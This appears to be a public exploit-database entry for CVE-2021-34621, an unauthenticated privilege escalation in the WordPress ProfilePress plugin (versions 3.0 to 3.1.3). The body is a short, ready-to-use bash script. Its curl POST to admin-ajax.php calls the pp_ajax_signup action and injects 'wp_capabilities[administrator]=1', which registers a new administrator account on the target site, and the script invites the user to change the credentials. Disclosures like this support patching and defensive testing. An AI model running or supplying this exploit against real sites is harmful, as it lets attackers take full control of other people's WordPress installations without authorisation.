# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Date: 23-08-2021
# Exploit Author: Numan Rajkotiya
# Vendor Homepage: https://profilepress.net/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13
[2] WordPress 4.7 or higher
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
# CVE : CVE-2021-34621
#!/bin/bash
# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3
# Change the name and password as per your requirement.
URL=$1
curl -X POST $URL"/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "reg_username=numan" \
-d "reg_email=pwned@numan.com" \
-d "reg_password=numan" \
-d "reg_password_present=true" \
-d "wp_capabilities[administrator]=1" \
-d "reg_first_name=pwned" \
-d "reg_last_name=numan" \
-d "action=pp_ajax_signup"